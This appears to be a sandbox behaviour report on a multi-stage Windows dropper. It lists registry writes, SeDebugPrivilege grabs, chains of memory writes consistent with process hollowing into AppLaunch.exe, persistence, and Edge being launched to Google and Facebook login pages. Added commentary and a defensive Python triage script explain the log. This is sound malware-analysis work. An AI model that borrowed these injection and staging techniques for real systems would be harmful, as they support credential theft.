Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (4 alternating pairs) N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (5 alternating pairs) N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (16 alternating pairs) N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AFB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E19.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (3 alternating pairs) N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (1 pair) N/A C:\Windows\Explorer.EXE N/A

Repeated Explorer.EXE rows are collapsed above with their counts. Explorer.EXE toggling SeShutdownPrivilege and SeCreatePagefilePrivilege is routine shell behaviour. The rows that matter are the SeDebugPrivilege grabs by the dropped stages (1Aj29Iy7.exe, AF69.exe, source1.exe, AFB.exe, E19.exe) and by powershell.exe: that privilege lets a process open handles to processes it does not own, which is the usual prerequisite for cross-process injection and for reaching SYSTEM-owned processes.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
(25 identical rows) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
(24 identical rows) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 4636 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe
PID 4636 wrote to memory of 968 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe
PID 968 wrote to memory of 1264 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe
PID 1264 wrote to memory of 3732 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe
PID 1264 wrote to memory of 680 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe
PID 680 wrote to memory of 1200 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 (10 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 968 wrote to memory of 4172 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe
PID 4172 wrote to memory of 1656 (6 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4636 wrote to memory of 5076 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe
PID 5076 wrote to memory of 1380 (8 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3444 wrote to memory of 3048 (3 writes) N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe
PID 3048 wrote to memory of 4780 (2 writes) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe C:\Windows\system32\cmd.exe
PID 4780 wrote to memory of 2016 (2 writes) N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 2776 (2 writes) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4780 wrote to memory of 4740 (2 writes) N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4740 wrote to memory of 3788 (2 writes) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 3564 (3 writes) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Identical rows are collapsed above with their write counts. Every ordinary spawn in this log (the dropper stages, cmd.exe, msedge.exe) shows two or three parent-to-child writes. The 6, 8 and 10 writes from 2rf9479.exe, 3nV70HK.exe and 4Hp031bP.exe into newly started AppLaunch.exe instances are the outliers; together with the "Suspicious use of SetThreadContext" signature in the summary this is consistent with process hollowing, a payload written into a freshly created, Microsoft-signed .NET host whose thread context is then redirected. PIDs 680, 4172, 5076 and 4488 are also the -p arguments of the WerFault.exe invocations listed under Processes, so three of the injecting stages and one AppLaunch.exe host crashed during the run.
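The table above lists one row per WriteProcessMemory call, so the same parent-to-child pair repeats. The Python below is an added example, not part of the sandbox output or of any vendor tooling: it parses rows in the table's format (a constructed subset copied from the table, with the same write counts), collapses the duplicates, rebuilds the lineage from the root sample to each child and flags children that are well-known hollowing hosts or that receive more writes than an ordinary spawn. The HOLLOW_HOSTS set and the two-to-three-writes baseline are assumptions taken from this log, not sandbox fields.

```python
"""Rebuild the injection chain from 'Suspicious use of WriteProcessMemory' rows.

Added example for this report, not sandbox output or vendor code.
"""
import ntpath
import re
from collections import OrderedDict

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) (C:\\.+)$")

# Assumption: signed Windows/.NET binaries that commodity stealers commonly
# start and then overwrite with their payload (AppLaunch.exe is the one seen here).
HOLLOW_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
# Assumption drawn from this log: an ordinary spawn appears as 2-3 writes.
NORMAL_SPAWN_WRITES = 3

TMP = r"C:\Users\Admin\AppData\Local\Temp"
ROOT = TMP + r"\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe"
STAGE1 = TMP + r"\IXP000.TMP\GG2Ha09.exe"
STAGE2 = TMP + r"\IXP001.TMP\XD1Kq18.exe"
STAGE3 = TMP + r"\IXP002.TMP\uD5ES53.exe"
STAGE4 = TMP + r"\IXP003.TMP\2rf9479.exe"
APPLAUNCH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
CMD = r"C:\Windows\system32\cmd.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"


def row(src_pid, dst_pid, src, dst):
    return f"PID {src_pid} wrote to memory of {dst_pid} N/A {src} {dst}"


# Constructed sample: a subset of the table, one line per logged write.
SAMPLE_ROWS = "\n".join(
    [row(3444, 4636, ROOT, STAGE1)] * 3
    + [row(4636, 968, STAGE1, STAGE2)] * 3
    + [row(968, 1264, STAGE2, STAGE3)] * 3
    + [row(1264, 680, STAGE3, STAGE4)] * 3
    + [row(680, 4488, STAGE4, APPLAUNCH)] * 10
    + [row(4780, 2016, CMD, EDGE)] * 2
    + [row(2016, 2776, EDGE, EDGE)] * 2
)


def parse_rows(text):
    """One dict per logged write; lines that are not table rows are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append({"src_pid": int(m[1]), "dst_pid": int(m[2]),
                           "src": m[3], "dst": m[4]})
    return events


def collapse(events):
    """Fold repeated rows into (src_pid, dst_pid, src, dst) -> number of writes."""
    counts = OrderedDict()
    for e in events:
        key = (e["src_pid"], e["dst_pid"], e["src"], e["dst"])
        counts[key] = counts.get(key, 0) + 1
    return counts


def stage_depth(path):
    """IXP###.TMP folders are where Windows self-extracting (wextract/IExpress)
    packages unpack; the index says how many nested droppers ran before this one."""
    found = re.findall(r"\\IXP(\d{3})\.TMP\\", path)
    return max(int(n) for n in found) + 1 if found else 0


def lineage(counts, pid):
    """Follow parent links back to the root: [root_pid, ..., pid]."""
    parent = {dst: src for (src, dst, _, _) in counts}
    chain = [pid]
    while chain[-1] in parent and len(chain) < 64:  # bound guards garbled input
        chain.append(parent[chain[-1]])
    return chain[::-1]


def flag_injections(counts):
    """Children that are known hollowing hosts or got more writes than a normal spawn."""
    findings = []
    for (src_pid, dst_pid, src, dst), writes in counts.items():
        reasons = []
        if ntpath.basename(dst).lower() in HOLLOW_HOSTS:
            reasons.append("target is a signed host commonly used for hollowing")
        if writes > NORMAL_SPAWN_WRITES:
            reasons.append(f"{writes} writes into one child (normal spawn: <= {NORMAL_SPAWN_WRITES})")
        if reasons:
            findings.append({"src_pid": src_pid, "dst_pid": dst_pid, "src": src, "dst": dst,
                             "writes": writes, "stage": stage_depth(src),
                             "lineage": lineage(counts, dst_pid), "reasons": reasons})
    return findings


def triage(text):
    events = parse_rows(text)
    counts = collapse(events)
    return {"events": len(events), "unique": len(counts), "findings": flag_injections(counts)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print(f"{result['events']} writes, {result['unique']} distinct parent->child pairs")
    for f in result["findings"]:
        print(f"PID {f['src_pid']} -> {f['dst_pid']} ({ntpath.basename(f['dst'])}): "
              f"{f['writes']} writes, dropper stage {f['stage']}, lineage {f['lineage']}")
        for r in f["reasons"]:
            print("  -", r)
```

Run as a script it reports the one chain that stands out in the subset: the sample, then GG2Ha09.exe, XD1Kq18.exe, uD5ES53.exe and 2rf9479.exe (four nested IXP*.TMP extraction stages), ending in ten writes into AppLaunch.exe PID 4488. Pasting the full table into SAMPLE_ROWS also surfaces the 3nV70HK.exe and 4Hp031bP.exe chains.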

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe

"C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 680 -ip 680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4488 -ip 4488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4172 -ip 4172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5076 -ip 5076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40DC.tmp\40DD.tmp\40DE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11110459970800923757,14463519812136531172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

